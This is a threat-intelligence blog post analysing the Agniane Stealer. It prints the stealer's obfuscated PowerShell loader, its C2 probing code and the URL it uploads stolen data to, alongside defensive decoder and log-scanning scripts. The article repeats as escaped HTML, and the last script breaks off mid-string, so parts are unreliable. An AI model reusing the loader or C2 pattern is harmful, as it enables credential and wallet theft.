Agniane Stealer: Information stealer targeting cryptocurrency users
Adela Jezkova on February 16, 2024 at 1:00 pm. Read more on Cisco Blogs.
The Agniane Stealer is an information-stealing malware that mainly targets the cryptocurrency wallets of its victims. It gained popularity on the internet starting in August 2023. Recently, we have observed a distinct campaign spreading it across our telemetry. Our recent study has led to the identification and detailed analysis of a previously unrecognized network URL pattern. Our researchers have also uncovered more information on the malware’s methods for file collection and the details of its command and control (C2) protocol, along with new reverse engineering insights into the malware’s architecture and communication.

We believe our work contributes to the tactical and operational levels of intelligence regarding Agniane Stealer. It can prove useful for anything from incident response to detector development, and it is written for a technical audience.

The Agniane Stealer has already been referenced in several articles. The Agniane Stealer malware is being actively marketed and sold through a Telegram channel, accessible at t[.]me/agniane. Potential buyers can make purchases directly via this channel by interacting with a specialized bot, named @agnianebot, which facilitates the transaction process and provides additional information about the malware. Our technical analysis indicates that it utilizes the ConfuserEx Protector and aims at identical targets. However, the sample observed in our telemetry data employs a distinct C2 method. Therefore, we have decided to publish a technical analysis of the sample.

Introduction

During our threat-hunting exercises in November 2023, we noticed a pattern of renamed PowerShell binaries called passbook.bat.exe. On closer inspection of the host machines, we identified infections by the newly discovered malware family Agniane Stealer. Threat researcher Gameel Ali (@MalGamy12) first disclosed the existence of this malware on their X account [1]. Researchers from the Zscaler ThreatLabz Team [2] and Pulsedive Threat Researchers [3] eventually followed up with blog posts of their own. Our work aims to contribute additional information to the understanding of campaigns involving the use of Agniane Stealer.

Execution Chain

[Figure: Execution chain.]

The infections we detected appear to start with the download of ZIP files from compromised websites. All the websites from which we have seen this file downloaded in our telemetry are normal websites with legitimate content. All download URLs matched the following pattern:

http[s]://<domain name>/book_[A-Z0-9]+-\d+.zip

Once downloaded and extracted, the ZIP file drops a BAT file (passbook.bat) and an additional ZIP file on the file system. The BAT file contains an obfuscated payload and, after its execution through cmd.exe, it drops an executable that is a renamed copy of the PowerShell binary (passbook.bat.exe). [4]

This renamed PowerShell binary was used to execute a series of obfuscated commands:

passbook.bat.exe -noprofile -windowstyle hidden -ep bypass -command $_CASH_esCqq = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:UsersuserAppDataLocalTemp15Rar$DIa63532.21112passbook.bat').Split([Environment]::NewLine);foreach ($_CASH_OjmGK in $_CASH_esCqq) { if ($_CASH_OjmGK.StartsWith(':: @')) { $_CASH_ceCmX = $_CASH_OjmGK.Substring(4); break; } };$_CASH_ceCmX = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ceCmX, '_CASH_', '');$_CASH_afghH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ceCmX);$_CASH_NtKXr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ws33cUsroVN/EsxO1rOfY1zGajQKWVFEvpkHI/JP6Is=');for ($i = 0; $i -le $_CASH_afghH.Length - 1; $i++) { $_CASH_afghH[$i] = ($_CASH_afghH[$i] -bxor $_CASH_NtKXr[$i % $_CASH_NtKXr.Length]); };$_CASH_DIacp = New-Object System.IO.MemoryStream(, $_CASH_afghH);$_CASH_yXEfg = New-Object System.IO.MemoryStream;$_CASH_QbnHO = New-Object System.IO.Compression.GZipStream($_CASH_DIacp, [IO.Compression.CompressionMode]::Decompress);$_CASH_QbnHO.CopyTo($_CASH_yXEfg);$_CASH_QbnHO.Dispose();$_CASH_DIacp.Dispose();$_CASH_yXEfg.Dispose();$_CASH_afghH = $_CASH_yXEfg.ToArray();$_CASH_hCnlS = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_afghH);$_CASH_Xhonj = $_CASH_hCnlS.EntryPoint;$_CASH_Xhonj.Invoke($null, (, [string[]] ('')))

The command line shown above performs the following actions:

- Reads the content of the previously extracted BAT file (passbook.bat).
- Through string matching and replacement, builds the payload dynamically and assigns it to a variable.
- Converts the payload and the static key from Base64 to byte arrays.
- XORs the payload with the static key.
- Decompresses the XOR-decoded payload using GZIP.
- Invokes the payload after reflectively loading it into memory.

To understand the actions taken toward the objective, we reversed the payload.
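As an added example (not code from the original post), the loader's decoding chain above replayed in Python so an analyst can recover the second stage from a passbook.bat file statically, without running the loader; the XOR key is the Base64 value from the observed command line, and the sample BAT content is constructed inline from a dummy payload.

```python
import base64
import gzip

# Base64-encoded XOR key exactly as it appears in the observed command line.
OBSERVED_KEY_B64 = "ws33cUsroVN/EsxO1rOfY1zGajQKWVFEvpkHI/JP6Is="
PAYLOAD_MARKER = ":: @"   # batch comment line that carries the encoded blob
NOISE_TOKEN = "_CASH_"    # junk token sprinkled through the blob


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, the same operation as the loader's for-loop."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def extract_payload(bat_text: str, key_b64: str = OBSERVED_KEY_B64) -> bytes:
    """Replay the loader's decoding steps on the text of a passbook.bat file.

    1. take the first line beginning with ':: @' and drop that prefix
    2. strip every '_CASH_' token
    3. Base64-decode the blob and the static key
    4. XOR the blob with the repeating key
    5. GZIP-decompress the result (the C# assembly that gets loaded)
    """
    encoded = None
    for line in bat_text.splitlines():
        if line.startswith(PAYLOAD_MARKER):
            encoded = line[len(PAYLOAD_MARKER):]
            break
    if encoded is None:
        raise ValueError("no ':: @' payload line found in BAT text")
    encoded = encoded.replace(NOISE_TOKEN, "")
    blob = base64.b64decode(encoded)
    key = base64.b64decode(key_b64)
    # A wrong key surfaces here as gzip.BadGzipFile rather than as garbage output.
    return gzip.decompress(xor_with_key(blob, key))


def looks_like_pe(data: bytes) -> bool:
    """Cheap sanity check: the recovered stage should start with an MZ header."""
    return data[:2] == b"MZ"


def build_sample_bat(payload: bytes, key_b64: str = OBSERVED_KEY_B64) -> str:
    """Constructed test fixture mimicking the BAT layout (not a real sample)."""
    key = base64.b64decode(key_b64)
    blob = base64.b64encode(xor_with_key(gzip.compress(payload), key)).decode()
    # Interleave the noise token every 16 characters, as the loader strips it anyway.
    noisy = NOISE_TOKEN.join(blob[i:i + 16] for i in range(0, len(blob), 16))
    return "@echo off\r\n" + PAYLOAD_MARKER + noisy + "\r\necho placeholder\r\n"


# Constructed dummy second stage: an MZ header plus filler, not a real assembly.
SAMPLE_PAYLOAD = b"MZ" + b"\x00" * 62 + b"constructed dummy second stage"
SAMPLE_BAT = build_sample_bat(SAMPLE_PAYLOAD)

if __name__ == "__main__":
    recovered = extract_payload(SAMPLE_BAT)
    print(len(recovered), "bytes recovered; MZ header present:", looks_like_pe(recovered))
```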

Binary Analysis

The invoked payload continues with the execution of a C# assembly. We dumped it to a file, which gave us an executable with the following hash:

5640c02b6d125d4e14e19709296b29b8ea34fe416e18b3d227bd79310d54b8df

At the time of the analysis, the file was unknown to online sandboxes. We decided to emulate the activity on the Cisco Secure Malware Analytics sandbox with generic settings on this file, which is the second stage of the stealer's deployment. The dynamic analysis could not be completed because we did not execute the first stage of the malware sample. Therefore, we decided to analyze the sample manually, where we later found that anti-sandbox techniques are used.

The binary file was highly obfuscated with control flow manipulations resembling ConfuserEx.

[Figure: Content of the passbook.bat file. Control flow obfuscation resembling ConfuserEx.]

It is important to note that the sample did not contain a signature for ConfuserEx, yet it had an obfuscation method that resembled it.

After reversing the sample, we realized it contains another binary file in its resources section, which is reflectively loaded. The new binary was another C#-based sample, which contained the final payload. It was obfuscated with ConfuserEx, with direct signatures.

[Figure: The C# file calling the Invoke function for in-memory loading and execution, a common approach to reflective loading of resource files.]

As you can see from the previous screenshot, it calls Invoke on an EntryPoint object, which contains the parsed resource.

[Figure: Loading resource data from the malicious sample, which is later executed in memory. The start of the execution is shown in the image above.]

The entire loading process works as follows: passbook.bat.exe (the renamed PowerShell) deobfuscates passbook.bat, which in turn runs the tmp385C.tmp C# application (tmp385C.tmp is just a header file name), which reflectively loads the _CASH_78 C# application. The final application in this sequence is the Agniane Stealer:

[Figure: Malware execution chain. _CASH_78 is the final payload; the multiple stages before it are used only for delivery, obfuscation or detection evasion.]

Command and Control

The Agniane Stealer operates in a straightforward yet efficient manner, stealing credentials and files from the endpoint using a basic C2 protocol. Initially, it verifies the availability of its domain names through a simple C# web request, checking whether the return value is “13”. This request is made to a URL labeled “test”, for instance:

WebClient wc = new WebClient();
urlData = wc.DownloadString("https://trecube[.]com/test");
if (urlData == "13")
{
    list_of_active_c2.Add("trecube[.]com");
    continue;
}

In our sample, we can see the following IOCs (indicators of compromise) present in the resources file:

trecube[.]com
trecube13[.]ru
imitato23[.]store
wood100home[.]ru

For each of these domains, the sample requests the test URL:

urlList = { "https://trecube[.]com/", "https://trecube13[.]ru/", "https://imitato23[.]store/", "https://wood100home[.]ru/" };
foreach (var domain in urlList)
{
    WebClient wc = new WebClient();
    urlData = wc.DownloadString(domain + "test");
    if (urlData == "13")
    {
        list_of_active_c2.Add(domain);
        continue;
    }
}

Later, the malware contacts the C2 to get a list of file extensions to look for. This is located at the URL pattern getext?id= followed by an ID, which is part of the resources of the _CASH_78 file. The returned list of extensions is separated by semicolons; for example, on the website trecube[.]store it looks like:

*.txt; *.doc; *.docx; *.wallet; *seed*

Again, this is handled like the previous check string in the code. It is parsed and split by semicolon, and a list of extensions is created in a C# list variable.

[Figure: Code handling observed via dynamic analysis, through which we identified the C2 URL by breaking on DownloadString.]

Subsequently, the malware requests a remote JSON file containing details about errors, VirusTotal hits, etc. Based on this information, the sample either proceeds or halts. We chose to focus our investigation on other aspects that are more directly relevant to attribution and detection. However, it is important to note that the URL pattern can be used for tracking the malware through telemetry or online sandbox services for OSINT purposes. The URL looks like:

hxxps://trecube13[.]ru/getjson?id=67

And here is what its corresponding output looks like:

{
  "debug": "0",
  "emulate": "0",
  "virtualbox": "1",
  "virustotal": "0",
  "error": "0",
  "errorname": "NONE",
  "errortext": "NONE",
  "competitor": "0"
}

The next stage involves enumeration and collection. It scans the computer to collect all documents with the extensions specified by the URL with the “getext” pattern, along with credentials found in common paths of the operating system, such as Mozilla Firefox storage, Chrome storage and saved Windows credentials. This is common activity amongst information-stealer malware. Additionally, Agniane checks the localization setting of the victim computer. If it contains any of the language packages below, it does not proceed with the infection:

ru-RU
kk-KZ
ro-MD
uz-UZ
be-BY
az-Latn-AZ
hy-AM
ky-KG
tg-Cyrl-TJ

The exclusion of these locales can also mean the developer does not want to attack specific regions. Based on other observations, it is reasonable to expect that the attacker is from a country with strong diplomatic ties to Russia.

Once all the target files are collected, the malware creates a ZIP archive under the “local application data” folder:

C:\Users\[user]\AppData\Local\[A-Z0-9]{32}

Below is the structure and content of this archive file:

- Agniane Stealer.txt // added as attachment here
- Installe Apps.txt // added as attachment here
- PC Information.txt // added as attachment here
- Files from Desktop // FOLDER: contains exfiltrated files from the Desktop folder
- Files from … // FOLDER: contains exfiltrated files from …
- … // and other folders, which contain exfiltrated files.

It is later uploaded to:

https://trecube[.]com/gate?id=67&build=BAT&passwords=0&cookies=124&username=johnny&country=&ip=&BSSID=633796aa42413148ca7d6ea04c9fc813&wallets=0&token=AGNIANE-67135734941648&ext=0&filters=0&pcname=DESKTOP-9U09UT1&cardsc=0

Below you can find the illustrated version of the Agniane Stealer’s C2 communication:

[Figure: The C2 communication protocol.]
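As an added example (not code from the original post), a small Python scanner that applies the URL patterns described above (the delivery ZIP name, the /test probe, and the getext, getjson and gate stages) to constructed proxy log lines; the log line layout, the host names and the query values in the sample are assumptions for the demonstration, and matching is done on path and query only so it does not depend on the specific C2 domains.

```python
import re
from urllib.parse import urlsplit

# Path/query patterns taken from the analysis above. Matching ignores the host,
# so a hit does not depend on any particular C2 domain being known in advance.
URL_RULES = [
    # ZIP delivered from compromised but otherwise legitimate websites
    ("agniane_delivery_zip", re.compile(r"^/book_[A-Z0-9]+-\d+\.zip$")),
    # stages of the C2 protocol
    ("agniane_c2_getext", re.compile(r"^/getext\?id=\d+$")),
    ("agniane_c2_getjson", re.compile(r"^/getjson\?id=\d+$")),
    ("agniane_c2_gate", re.compile(r"^/gate\?id=\d+&build=[^&]*&.*token=AGNIANE-\d+")),
]
# "/test" is far too generic on its own; it is reported only for hosts that
# also served one of the C2 stages above.
TEST_PATH = re.compile(r"^/test$")

# Assumed log line layout (constructed): "<timestamp> <client-ip> <method> <url>"
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+)$")


def split_url(url: str):
    """Return (hostname, path-plus-query) for a URL."""
    parts = urlsplit(url)
    path_q = parts.path or "/"
    if parts.query:
        path_q += "?" + parts.query
    return (parts.hostname or "").lower(), path_q


def classify_path(path_q: str):
    """Return the rule tag matching this path/query, or None."""
    for tag, rx in URL_RULES:
        if rx.search(path_q):
            return tag
    return None


def scan_log(log_text: str) -> list:
    """Scan proxy log text and return hits as dicts sorted by line number."""
    hits = []
    test_probes = {}   # host -> first line number that requested /test
    c2_hosts = set()
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        host, path_q = split_url(m.group("url"))
        tag = classify_path(path_q)
        if tag:
            hits.append({"line": lineno, "tag": tag, "host": host})
            if tag.startswith("agniane_c2_"):
                c2_hosts.add(host)
        elif TEST_PATH.match(path_q):
            test_probes.setdefault(host, lineno)
        elif host == "ip-api.com" and path_q.startswith("/json/"):
            # Legitimate service the stealer uses for its public-IP check:
            # informational only, never a verdict on its own.
            hits.append({"line": lineno, "tag": "public_ip_lookup_informational", "host": host})
    # Corroborate /test probes with a later C2 stage on the same host.
    for host, lineno in test_probes.items():
        if host in c2_hosts:
            hits.append({"line": lineno, "tag": "agniane_c2_test_probe", "host": host})
    hits.sort(key=lambda h: h["line"])
    return hits


# Constructed sample log; hosts and values are placeholders, not real IOCs.
SAMPLE_LOG = """\
2023-11-14T09:01:12Z 10.0.0.23 GET https://legit-example.invalid/book_A7F3K9-102.zip
2023-11-14T09:01:40Z 10.0.0.23 GET https://c2-example.invalid/test
2023-11-14T09:01:41Z 10.0.0.23 GET https://c2-example.invalid/getext?id=67
2023-11-14T09:01:42Z 10.0.0.23 GET https://c2-example.invalid/getjson?id=67
2023-11-14T09:01:43Z 10.0.0.23 GET http://ip-api.com/json/?fields=11827
2023-11-14T09:02:10Z 10.0.0.23 POST https://c2-example.invalid/gate?id=67&build=BAT&passwords=0&cookies=3&username=constructed&token=AGNIANE-0000000000&ext=0
2023-11-14T09:05:00Z 10.0.0.42 GET https://intranet.invalid/test
2023-11-14T09:06:00Z 10.0.0.42 GET https://files.invalid/book_report.zip
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["line"], hit["tag"], hit["host"])
```

The lone /test on intranet.invalid and the lowercase book_report.zip are deliberately left unflagged to show the corroboration and pattern boundaries.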

Other TTPs

The Agniane Stealer was also seen performing the following actions:

- Enumerating the registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall for installed applications; it also collects this information.
- Checking for the public IP address via ip-api.com, i.e., https://ip-api.com/json/?fields=11827
- Dumping Bitcoin and other cryptocurrency wallets.
- Performing (not very robust) checks to see whether it is running in a debugged or virtual environment.
- Collecting wallet.dat files.
- Enumerating profile and user data.
- Collecting stored credit cards.
- Adding other malware such as NGenTask.exe.log (the file with the SHA cf342712ac75824579780abdb0e12d7ba9e3de93f311e0f3dd5b35f73a6bbc3).

Conclusion

The Agniane Stealer tries to remain undetected through various obfuscation and anti-VM/debug techniques. It exhibits behavior common to stealers, such as collecting and exfiltrating files, credentials, passwords, credit card details, wallets, etc. Its evasive nature and targeting of various kinds of information might attract more adversaries to leverage its services in the future.

Kill Chain

Kill Chain | Activity | TTP
--- | --- | ---
Weaponization | Use of PowerShell, ZIP file, batch file | T1059.005, T1059.001
Delivery | ZIP file downloaded by the browser | T1204.002
Delivery | Use of compromised websites | T1584.004
Exploitation | Running obfuscated PowerShell payload | T1059.001, T1027.010
Exploitation | PowerShell decrypts payload using XOR and decompresses using Gunzip | T1140, T1059.001
Exploitation | Reflective loading of the payload through PowerShell | T1059.001, T1204.002, T1620
Exploitation | Use of renamed PowerShell | T1036.003
Installation | |
Command and Control | |
Actions on Objectives | Collection of various information from the host | T1119
Actions on Objectives | Targeting of credentials | T1555

Indicators of Compromise

Type | Stage | IOC (indicators of compromise)
--- | --- | ---
File Hash | Delivery | 5640c02b6d125d4e14e19709296b29b8ea34fe416e18b3d227bd79310d54b8df
File Hash | Delivery | e59b14121b64ca353b90c10ec915dbd64c09855bca9af285aa3aeac046538574
File Hash | Delivery | b2a0c5d52b671e501ea91f8230bd266e1d459350a935ad0689833f522be66f87
Domain | C2 | trecube[.]com
Domain | C2 | trecube[.]store
Domain | C2 | trecube13[.]ru
Domain | C2 | imitato23[.]store
Domain | C2 | wood100home[.]ru

References

[1] https://twitter.com/MalGamy12/status/1688984207752663040?t=xECvfQF8pujQERAmhfI41w
[2] https://www.zscaler.com/blogs/security-research/agniane-stealer-dark-web-s-crypto-threat
[3] https://blog.pulsedive.com/analyzing-agniane-stealer/
[4] https://www.pcrisk.com/removal-guides/27510-agniane-stealer

We\u2019d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Security on social!<\/em><\/p>\n

Cisco Security Social Channels<\/strong><\/p>\n

Instagram<\/a><\/strong>Facebook<\/a><\/strong>Twitter<\/a><\/strong>LinkedIn<\/a><\/strong><\/p>\n

\n\t\tShare\n
\n
<\/div>\n<\/div>\n
\n
\n\t\t<\/a>\n\t<\/div>\n<\/div>\n
\n
\n\t\t<\/a>\n\t<\/div>\n<\/div>\n
\n
\n\t <\/a>\n\t<\/div>\n<\/div>\n<\/div>\n
Share:<\/div>\n
\n
\n
<\/div>\n<\/div>\n
\n
\n\t\t<\/a>\n\t<\/div>\n<\/div>\n
\n
\n\t\t<\/a>\n\t<\/div>\n<\/div>\n
\n
\n\t <\/a>\n\t<\/div>\n<\/div>\n<\/div>\n

“]]\u00a0\u00a0Agniane Stealer is a malware that targets credentials and documents, actively sold on Telegram, with ConfuserEX obfuscations, presents novel C2 protocol.\u00a0\u00a0Read More<\/a>\u00a0Cisco Blogs\u00a0<\/p>","protected":false},"excerpt":{"rendered":"

<\/p>\n

The Agniane Stealer is an information-stealing malware mainly targeting the cryptocurrency wallets of its victims. It gained popularity on the internet starting in August 2023. Recently, we have\u2026 Read more on Cisco Blogs<\/a><\/p>\n

\u200b[[“value”:”<\/p>\n

The Agniane Stealer is an information-stealing malware mainly targeting the cryptocurrency wallets of its victims. It gained popularity on the internet starting in August 2023. Recently, we have observed a distinct campaign spreading it across our telemetry. Our recent study has led to the successful identification and detailed analysis of a previously unrecognized network URL pattern. Our researchers have recently uncovered more information on the malware\u2019s methods for file collection and the intricacies of its command and control (C2) protocol. We also have new reverse engineering insights into the malware\u2019s architecture and communication.<\/p>\n

We believe our work contributes to tactical and operational levels of intelligence regarding Agniane Stealer. It can prove useful from incident response to detector development and would be more suitable for a technical audience.<\/p>\n

The Agniane Stealer has already been referenced in several articles. The Agniane stealer malware is being actively marketed and sold through a Telegram channel, accessible at t[.]me\/agniane. Potential buyers can make purchases directly via this channel by interacting with a specialized bot, named @agnianebot, which facilitates the transaction process and provides additional information about the malware.\u201d Our technical analysis indicates that it utilizes the ConfuserEx Protector and aims at identical targets. However, it employs a distinct C2 method, based on the sample observed in our telemetry data. Therefore, we have decided to publish a technical analysis of the sample.<\/p>\n

Introduction<\/strong><\/h2>\n

During our threat-hunting exercises in November 2023, we have noticed a pattern of renamed PowerShell binaries, called passbook.bat.exe. On closer inspection of the host machines, we have identified infections of the newly discovered malware family of Agniane Stealer. Threat research Gameel Ali (@MalGamy12) first disclosed the existence of this malware on their X account. Researchers from the Zscaler ThreatLabz Team [2] and Pulsedive Threat Researchers [3] eventually followed up with blog posts of their own. Our work aims to contribute additional information understanding campaigns involving the use of Agniane Stealer.<\/p>\n

Execution Chain<\/strong><\/h2>\n

Execution chain.<\/p>\n

The infections we detected seem to start with the downloading of ZIP files from compromised websites. All the websites from where we have seen the download of this file in our telemetry are normal websites with legitimate content. All download URLs had the below URL pattern:<\/p>\n

http[s]:\/\/<domain name>\/book_[A-Z0-9]+-d+.zip<\/p>\n

Once downloaded and extracted,\u00a0the downloaded ZIP file drops a BAT file (passbook.bat) and additional ZIP file on the file system. The BAT file contains an obfuscated payload and after its execution through cmd.exe, it drops an executable which is renamed version of PowerShell binary (passbook.bat.exe). [4]<\/p>\n

This enamed PowerShell was used to execute series of obfuscated commands.<\/p>\n

passbook.bat.exe -noprofile -windowstyle hidden -ep bypass -command $_CASH_esCqq = [System.IO.File]::(\u2018txeTllAdaeR'[-1..-11] -join\u00a0\u201d)(\u2018C:UsersuserAppDataLocalTemp15Rar$DIa63532.21112passbook.bat\u2019).Split([Environment]::NewLine);foreach ($_CASH_OjmGK in $_CASH_esCqq) \u00a0if<\/strong>\u00a0($_CASH_OjmGK.StartsWith(\u2018:: @\u2019)) $_CASH_ceCmX = $_CASH_OjmGK.Substring(4);\u00a0break<\/strong>; ; ;$_CASH_ceCmX = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ceCmX,\u00a0\u2018_CASH_\u2019,\u00a0\u201d);$_CASH_afghH = [System.Convert]::(\u2018gnirtS46esaBmorF'[-1..-16] -join\u00a0\u201d)($_CASH_ceCmX);$_CASH_NtKXr = [System.Convert]::(\u2018gnirtS46esaBmorF'[-1..-16] -join\u00a0\u201d)(\u2018ws33cUsroVN\/EsxO1rOfY1zGajQKWVFEvpkHI\/JP6Is=\u2019);for<\/strong>\u00a0($i =\u00a00; $i -le $_CASH_afghH.Length \u2013\u00a01; $i++) $_CASH_afghH[$i] = ($_CASH_afghH[$i] -bxor $_CASH_NtKXr[$i % $_CASH_NtKXr.Length]); ;$_CASH_DIacp = New-Object System.IO.MemoryStream(, $_CASH_afghH);$_CASH_yXEfg = New-Object System.IO.MemoryStream;$_CASH_QbnHO = New-Object System.IO.Compression.GZipStream($_CASH_DIacp, [IO.Compression.CompressionMode]::Decompress);$_CASH_QbnHO.CopyTo($_CASH_yXEfg);$_CASH_QbnHO.Dispose();$_CASH_DIacp.Dispose();$_CASH_yXEfg.Dispose();$_CASH_afghH = $_CASH_yXEfg.ToArray();$_CASH_hCnlS = [System.Reflection.Assembly]::(\u2018daoL'[-1..-4] -join\u00a0\u201d)($_CASH_afghH);$_CASH_Xhonj = $_CASH_hCnlS.EntryPoint;$_CASH_Xhonj.Invoke($null<\/strong>, (, [string[]] (\u201d)))<\/p>\n

The command line shown above performs the following actions:<\/p>\n

Reads the content of the previously extracted BAT file (passbook.bat).
\nThrough string matches and replacements, builds the payload dynamically and assigns it to a variable.
\nConverted payload and static key from Base64 to a byte array.
\nXOR\u2019d the payload using a static key.
\nDecompressed XOR\u2019d payload using GZIP.
\nInvokes payload after reflectively loading it into memory.<\/p>\n

To understand actions taken toward the objective, we reversed the payload.<\/p>\n

Binary Analysis<\/strong><\/h2>\n

The invoked payload continues with the execution of a C# assembly. We have dumped it into a file, where we get the executable with below hash,<\/p>\n

5640c02b6d125d4e14e19709296b29b8ea34fe416e18b3d227bd79310d54b8df.<\/p>\n

At time of the analysis, the file was unknown to online sandboxes. We have decided to emulate the activity on the Cisco Secure Malware Analytics sandbox with the generic settings on this file, which is the second stage of the deployment of the stealer. The dynamic analysis could not be completed as we did not execute the first stage of the sample of the malware. Therefore, we decided to analyze the sample manually, where we found later there are anti-sandbox techniques used.<\/p>\n

The binary file was highly obfuscated with control flow manipulations, like ConfuserEx.<\/p>\n

Content of the passbook.bat file. Control flow obfuscation like ConfuserEx.<\/p>\n

It is important to note that the sample did not contain a signature for ConfuserEx, yet it had an obfuscation method that resembled it.<\/p>\n

After reversing the sample, we realized it contains another binary file in its resources section, which were getting reflectively loaded. The new binary was another C#-based sample, which contained the final payload. It was obfuscated with ConfuserEx with direct signatures.<\/p>\n

Content of the passbook.bat file. Control flow obfuscation like ConfuserEx.The C# file calling Invoke function for in memory loading and executions, a common approach to reflective loading of resources files.<\/p>\n

As you can see from the previous screenshot, it is calling Invoke functions from an entry Point object, which contains a parsed resource.<\/p>\n

Loading resource data from malicious sample, which is later executed in the memory. The start of the execution is in the image above.<\/p>\n

The entire loading process appears as though passbook.bat.exe is executing PowerShell, which is deobfuscating passbook.bat. This, in turn, is running the tmp385C.tmp (tmp385C.tmp is just a header file name) C# applications, which reflectively load the _CASH_78 C# application. The final application in this sequence is the Agniane Stealer:<\/p>\n

Malware execution chain. _CASH_78 is the final payload. The previous steps were used only for obfuscations. There were multiple stages of sample to finally loading _CASH_78 app. _CASH_78 app is final malware, stages before are used only for delivery, obfuscations or detection evasion.<\/p>\n

Command and Control<\/strong><\/h2>\n

The Agniane Stealer operates in a straightforward yet efficient manner, stealing credentials and files from the endpoint using a basic C2 protocol. Initially, it verifies the availability of any domain names through a simple C# web request, checking if the return value is \u201c13.\u201d This time request was made to a URL labeled \u201ctest,\u201d for instance.<\/p>\n

WebClient wc =\u00a0new<\/strong>\u00a0WebClient();<\/p>\n

urlData = wc.DownloadString(\u201chttps:\/\/trecube<\/a>[.]com\/test\u201d);<\/p>\n

If urlData ==\u00a0\u201c13\u201d\u00a0<\/p>\n

list_of_active_c2.Add(\u201ctrecube[.]com\u201d)<\/p>\n

continue<\/strong>;<\/p>\n

In our sample, we can see the following IOCs (indicators of compromise) presented in resources file:<\/p>\n

trecube[.]com<\/p>\n

trecube13[.]ru<\/p>\n

imitato23[.]store<\/p>\n

wood100home[.]ru<\/p>\n

For all these domains, the sample is calling for a test URL.<\/p>\n

urlList = \u201chttps:\/\/trecube.com\/<\/a>\u201c,\u00a0\u201chttps:\/\/trecube13.ru\/<\/a>\u201c,\u00a0\u201chttps:\/\/imitato23.store\/<\/a>\u201c,\u00a0\u201chttps:\/\/wood100home.ru\/<\/a>\u201c<\/p>\n

for<\/strong>\u00a0domain in domainList:<\/p>\n

WebClient wc =\u00a0new<\/strong>\u00a0WebClient();<\/p>\n

urlData = wc.DownloadString(domain +\u00a0\u201ctest\u201d);<\/p>\n

If urlData ==\u00a0\u201c13\u201d\u00a0<\/p>\n

list_of_active_c2.Add(domain)<\/p>\n

continue<\/strong>;<\/p>\n

Later, the malware calls C2 to get a list of file extensions to look for. This is located at URL pattern\u00a0getext?id=<\/strong>\u00a0followed by an ID \u2013 a part of resources of the _CASH_78<\/strong> file. On this website, the list of extensions is separated by a semicolon, and for example on a website trecube[.]store it looks like:<\/p>\n

*.txt; *.doc; *.docx; *.wallet; *seed*<\/p>\n

Again, this is handled as previous checking string in the code. It is parsed\/split by semicolon and a list of extensions is created in a list of variables in C# code.<\/p>\n

The Code handling via dynamic analysis, through which we identified the C2 URL as a breakpoint for DownloadString.<\/p>\n

Subsequently, the malware requests a remote json <\/strong>file containing the details about errors, VirusTotal hits, etc. Based on this information, the sample either progresses or halts. We chose to focus our investigation on other aspects that are more directly relevant to attribution and detection settings. However, it is important to note that the URL pattern can be utilized for tracking malware through telemetry or online sandbox services for OSINT purposes. The URL looks like:<\/p>\n

hxxps:\/\/trecube13[.]ru\/getjson?id=67<\/p>\n

And here what its corresponding output looks like:<\/p>\n

{
    "debug": "0",
    "emulate": "0",
    "virtualbox": "1",
    "virustotal": "0",
    "error": "0",
    "errorname": "NONE",
    "errortext": "NONE",
    "competitor": "0"
}

The next stage involves enumeration and collection. The malware scans the computer for all documents with the extensions specified by the getext response, along with credentials found in common locations of the operating system, such as Mozilla Firefox storage, Chrome storage and saved Windows credentials. This is common behaviour among information stealers. Additionally, Agniane checks the localization settings of the victim computer. If any of the language packs below is present, it does not proceed with the infection:

ru-RU
kk-KZ
ro-MD
uz-UZ
be-BY
az-Latn-AZ
hy-AM
ky-KG
tg-Cyrl-TJ

Allowlisting these regions can also mean the developer does not want to attack them. Combined with other observations, it is plausible that the attacker operates from a country with strong diplomatic ties to Russia.

Once all the target files are collected, the malware creates a ZIP archive under the "local application data" folder:

C:\Users\[user]\AppData\Local\[A-Z0-9]{32}

Below is the structure and content of this archive file:

Agniane Stealer.txt    // added as attachment here
Installe Apps.txt      // added as attachment here
PC Information.txt     // added as attachment here
Files from Desktop     // FOLDER: contains exfiltrated files from the Desktop folder
Files from …           // FOLDER: contains exfiltrated files from …
…                      // other folders containing exfiltrated files

It is later uploaded to:

https://trecube[.]com/gate?id=67&build=BAT&passwords=0&cookies=124&username=johnny&country=&ip=&BSSID=633796aa42413148ca7d6ea04c9fc813&wallets=0&token=AGNIANE-67135734941648&ext=0&filters=0&pcname=DESKTOP-9U09UT1&cardsc=0

Below is an illustrated version of the Agniane Stealer's C2 communication.

The C2 communication protocol.
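The protocol walk-through above (availability check on /test, extension list from getext?id=, sandbox report from getjson?id=, upload to gate?id=...&token=AGNIANE-...) maps directly onto proxy-log hunting. The following Python is an added example, not code from the article or from Cisco: it classifies each URL in a constructed proxy log by C2 stage, rates confidence by whether the host is one of the article's C2 domains or the URL carries the AGNIANE- token, pulls the victim metadata out of a gate upload, and parses a semicolon-separated getext response into glob patterns so an analyst can see which files such a list would sweep up. The log layout, client addresses and file names are assumptions; the domains, URL shapes and the sample gate query string are the ones reported above.

```python
"""Hunt for Agniane Stealer C2 traffic in web-proxy logs.

Added example: URL shapes and C2 domains come from the article; the log
layout ("<timestamp> <client> <method> <url>"), client addresses and the
file names below are constructed for illustration.
"""
from fnmatch import fnmatch
from urllib.parse import parse_qs, urlsplit

# C2 domains from the article's IOC table (real form, for matching).
KNOWN_C2_DOMAINS = {
    "trecube.com", "trecube.store", "trecube13.ru",
    "imitato23.store", "wood100home.ru",
}

# Constructed proxy log; the last line is a decoy on an unrelated host.
SAMPLE_PROXY_LOG = """\
2024-02-16T10:00:01Z 10.0.0.5 GET https://trecube.com/test
2024-02-16T10:00:02Z 10.0.0.5 GET https://trecube13.ru/test
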